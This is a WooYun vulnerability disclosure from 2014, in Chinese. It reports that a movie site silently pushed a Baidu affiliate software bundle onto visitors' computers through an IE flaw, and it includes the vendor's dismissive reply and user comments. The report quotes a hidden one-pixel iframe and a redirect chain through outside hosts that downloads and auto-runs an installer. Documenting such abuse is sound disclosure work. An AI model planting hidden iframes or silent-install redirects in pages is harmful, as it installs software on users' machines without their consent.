当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085575

漏洞标题:百度有钱联盟利用IE漏洞推广安装软件

相关厂商:百度

漏洞作者: 路人甲

提交时间:2014-12-03 23:56

修复时间:2014-12-07 18:48

公开时间:2014-12-07 18:48

漏洞类型:恶意信息传播

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-03: 细节已通知厂商并且等待厂商处理中
2014-12-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

女盆友要看片,找啊找的就找到家影音站,然后电脑咻的自动装上了百度杀毒/卫士/浏览器/输入法一家子。安装包来自百度有钱联盟,144MB啊亲,电脑快卡死了有没有

详细说明:

在费很大气把电脑救活之后,在一堆浏览器的历史记录找到了这个链接http://www.80ydw.com/movie/693.html
通过查看页面源代码,可以看到嵌入了如下代码:
<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>
再查看http://hpa.pw/HHH的全文代码,会发现这个页面会跳转到http://221.233.160.110/images/xml.html
最终通过该页面,下载并自动执行http://dlsw.br.baidu.com/ditui/BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,没错,来自百度有钱联盟的144MB的安装包。

漏洞证明:

1.png


QQ截图20141202161238.jpg


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-07 18:48

厂商回复:

报告前已经知晓,为渠道商私人行为,我们已经处理,并且后续会加强对这方面的管理

最新状态:

暂无

漏洞评价:

评论

  1. 2014-12-04 10:15 | 我勒个去 ( 实习白帽子 | Rank:98 漏洞数:8 | 我勒个去)

    有点判断力行不?是这些网站在刷钱~_~

  2. 2014-12-07 09:52 | return ( 路人 | Rank:3 漏洞数:3 | 伪技术爱好者。)

    个人行为,跟有钱无关吧。。。

  3. 2014-12-07 19:01 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | 未满18周岁,不准进入.)

    乌云的临时工审核的.

  4. 2014-12-07 19:19 | anlfi ( 路人 | Rank:4 漏洞数:1 | 如果我不能我就一定要,如果我一定要我就一...)

    前天好像也看到了这个洞,不知道是不是洞主发的.

  5. 2014-12-07 21:47 | Arthur ( 实习白帽子 | Rank:77 漏洞数:33 | USA,I am coming!!!!!)

    我莫名其妙的装上了金山毒霸,有时还是瑞星杀毒。。。。

  6. 2015-02-12 04:06 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)

    要访问的网站包含恶意软件目前221.233.160.110上的攻击程序可能会试图在您的计算机上安装危险程序来窃取或删除您的信息(例如:照片、密码、通讯内容和信用卡信息)。自动向Google报告可能出现的安全事件详情。隐私权政策